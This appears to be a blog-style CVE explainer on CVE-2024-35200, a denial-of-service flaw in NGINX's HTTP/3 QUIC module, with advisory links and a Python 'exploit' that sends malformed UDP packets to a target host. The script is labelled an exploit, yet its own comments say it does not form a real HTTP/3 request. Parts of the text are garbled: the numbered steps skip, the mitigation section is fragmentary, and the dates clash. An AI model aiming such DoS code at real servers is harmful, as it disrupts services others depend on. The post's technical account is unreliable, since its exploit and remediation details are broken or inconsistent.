CVE CyberSecurity Database News

CVE-2024-35200 - Critical HTTP/3 QUIC Flaw Crashes NGINX Worker Processes (Explained with Exploit Example)

Poster -

CVE-2024-35200 is a major security vulnerability impacting users of both NGINX Plus and NGINX Open Source (OSS), specifically when the HTTP/3 QUIC module is enabled. In simple terms: a specially crafted HTTP/3 request can crash your NGINX worker processes, causing denial of service (DoS). Let’s break this down, show how the exploit works, and keep you safe.

What is CVE-2024-35200?

Discovered in June 2024, this vulnerability arises because of how NGINX parses and handles certain HTTP/3 requests over QUIC. Attackers can send mysterious or malformed HTTP/3 messages that NGINX isn’t expecting (sometimes called “undisclosed HTTP/3 requests”), which causes worker processes to crash.

If this keeps happening, your web service becomes unreliable or completely unavailable—a classic denial of service attack.

* You run NGINX OSS (open source) or NGINX Plus

* You have enabled the HTTP/3/QUIC module

* Your service is exposed to the public internet

If you use only HTTP/1.1 or HTTP/2, you are NOT affected.

Nginx Security Advisory:

https://mailman.nginx.org/pipermail/nginx-announce/2024/000369.html

Github CVE:

https://github.com/advisories/GHSA-73g8-x5hq-vv5j

NIST NVD:

https://nvd.nist.gov/vuln/detail/CVE-2024-35200

How Does the Exploit Work?

The crux of the problem is that HTTP/3 sits on top of QUIC (UDP-based, different from HTTP/2 over TCP). NGINX’s QUIC implementation does not properly handle certain malformed or unexpected HTTP/3 packets. Here’s a simplified explanation:

1. Attacker sends a malformed HTTP/3 request: For example, an incomplete or protocol-violating header.

Example Exploit (Python)

Let’s see a conceptual Python code for how this might look in practice.
Note: This is for educational and defensive testing in YOUR OWN environments only.

import socket
import struct

# NOTE: QUIC is UDP-based; make sure your server listens at UDP 443 with HTTP/3 enabled!

def send_malformed_quic_packet(target_ip, target_port):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # This is NOT a full QUIC handshake / HTTP/3 request (would require full QUIC library)
    # But even malformed, unexpected packets can trigger bugs in earlier NGINX versions.
    # Here we send random garbage to emulate a malformed HTTP/3 connection:
    # Proper exploit would use a library like aioquic or quicly

    data = b'\xc3\xff\xff\xff'  # Invalid QUIC packet header
    data += b'\x00\x00\x00\x00' # Padding/more garbage
    s.sendto(data, (target_ip, target_port))
    print(f"Sent bogus QUIC packet to {target_ip}:{target_port}")

# Usage example (replace with actual target)
send_malformed_quic_packet("1.2.3.4", 443)

Real attackers might use a proper HTTP/3/QUIC library (like aioquic) to craft much more subtle protocol-violating requests.

Both NGINX OSS and Plus have patched versions. Download the latest packages

- NGINX OSS releases
- NGINX Plus Customers

listen 443 quic reuseport;

# and/or

`

3. Firewall UDP port 443 for external access if HTTP/3 is not needed.

Conclusion

CVE-2024-35200 is a serious reminder that cutting-edge technologies like HTTP/3 and QUIC can still have sharp edges. Even a simple, unexpected network packet can take down your production NGINX cluster!

Upgrading is the only real fix. If you deploy HTTP/3, update your software and watch your error logs for unexpected worker deaths. Consider using active security monitoring and keep your build updated.

Further Reading

- How to enable or disable HTTP/3 in NGINX
- QUIC and HTTP/3 explained simply (Cloudflare)
- Aioquic: Python QUIC Library (for testing)

Timeline

Published on: 05/29/2024 16:15:10 UTC
Last modified on: 06/10/2024 18:15:34 UTC